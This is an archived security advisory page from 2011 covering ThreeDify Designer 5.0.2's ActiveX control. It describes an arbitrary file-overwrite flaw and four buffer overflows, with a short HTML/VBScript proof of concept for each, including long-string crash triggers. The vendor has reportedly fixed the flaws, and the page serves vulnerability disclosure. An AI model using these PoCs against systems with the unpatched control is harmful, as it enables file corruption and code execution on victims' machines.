what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ThreeDify Designer 5.0.2 Insecure Method / Buffer Overflows

ThreeDify Designer 5.0.2 Insecure Method / Buffer Overflows
Posted Aug 4, 2011
Authored by High-Tech Bridge SA | Site htbridge.com

ThreeDify Designer version 5.0.2 suffers from Active-X insecure method and buffer overflow vulnerabilities.

tags | exploit, overflow, vulnerability, activex
SHA-256 | a9ef54977565ac62eb5fc5f2fbc83d8daf0981d58baae77d3116595349ead071

ThreeDify Designer 5.0.2 Insecure Method / Buffer Overflows

Change Mirror Download
=========================================
Vulnerability ID: HTB23021
Reference: http://www.htbridge.ch/advisory/threedify_designer_activex_control_insecure_method.html
Product: ThreeDify Designer
Vendor: ThreeDify ( http://www.threedify.com )
Vulnerable Version: 5.0.2 and probably prior
Tested on: 5.0.2
Vendor Notification: 07 June 2011
Vulnerability Type: Insecure Method
Status: Fixed by Vendor
Risk level: Medium
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )

Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered a vulnerability in ThreeDify Designer ActiveX control, which can be exploited to overwrite arbitrary files.

The vulnerability is caused due to the ThreeDify.ThreeDifyDesigner.1 (ActiveSolid.dll) ActiveX control including the insecure "cmdSave()" method.
This can be exploited to corrupt arbitrary files in the context of the currently logged-on user.

The following PoC code is available:


<html>
<object classid='clsid:32B165C1-AD31-11D5-8889-0010A4C62D06' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>

Sub Boom()
arg1="FilePath\Filename_to_create_or_to_overwrite"
target.cmdSave arg1
End Sub

</script>
</html>

Solution: Upgrade to the most recent version


=========================================
Vulnerability ID: HTB23020
Reference: http://www.htbridge.ch/advisory/threedify_designer_activex_control_multiple_buffer_overflow_vulnerabilities.html
Product: ThreeDify Designer
Vendor: ThreeDify ( http://www.threedify.com )
Vulnerable Version: 5.0.2 and probably prior
Tested on: 5.0.2
Vendor Notification: 07 June 2011
Vulnerability Type: Buffer Overflow
Status: Fixed by Vendor
Risk level: High
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )

Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered a multiple buffer overflow vulnerabilities in ThreeDify Designer ActiveX control.

1) User-supplied data in "fileName" parameter is not properly bound-checked before being copied into an insufficiently sized buffer in "cmdExport()" method in ActiveSolid.dll file.
Successful exploitation of the vulnerability allows remote attackers to execute arbitrary code in the context of the vulnerable application.
The following PoC code is available:


<html>
<body>
<object classid='clsid:32B165C1-AD31-11D5-8889-0010A4C62D06' id='target'></object>
<script language='vbscript'>
arg1=String(3000, "A")
target.cmdExport arg1
</script>
</body>
</html>


2) User-supplied data in "fileName" parameter is not properly bound-checked before being copied into an insufficiently sized buffer in "cmdImport()" method in ActiveSolid.dll file.
Successful exploitation of the vulnerability allows remote attackers to execute arbitrary code in the context of the vulnerable application.
The following PoC code is available:


<html>
<body>
<object classid='clsid:32B165C1-AD31-11D5-8889-0010A4C62D06' id='target'></object>
<script language='vbscript'>
arg1=String(3000, "A")
target.cmdImport arg1
</script>
</body>
</html>


3) User-supplied data in "fileName" parameter is not properly bound-checked before being copied into an insufficiently sized buffer in "cmdOpen()" method in ActiveSolid.dll file.
Successful exploitation of the vulnerability allows remote attackers to execute arbitrary code in the context of the vulnerable application.
The following PoC code is available:


<html>
<body>
<object classid='clsid:32B165C1-AD31-11D5-8889-0010A4C62D06' id='target'></object>
<script language='vbscript'>
arg1=String(3000, "A")
target.cmdOpen arg1
</script>
</body>
</html>


4) User-supplied data in "fileName" parameter is not properly bound-checked before being copied into an insufficiently sized buffer in "cmdSave()" method in ActiveSolid.dll file.
Successful exploitation of the vulnerability allows remote attackers to execute arbitrary code in the context of the vulnerable application.
The following PoC code is available:


<html>
<body>
<object classid='clsid:32B165C1-AD31-11D5-8889-0010A4C62D06' id='target'></object>
<script language='vbscript'>
arg1=String(3000, "A")
target.cmdSave arg1
</script>
</body>
</html>

Solution: Upgrade to the most recent version
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close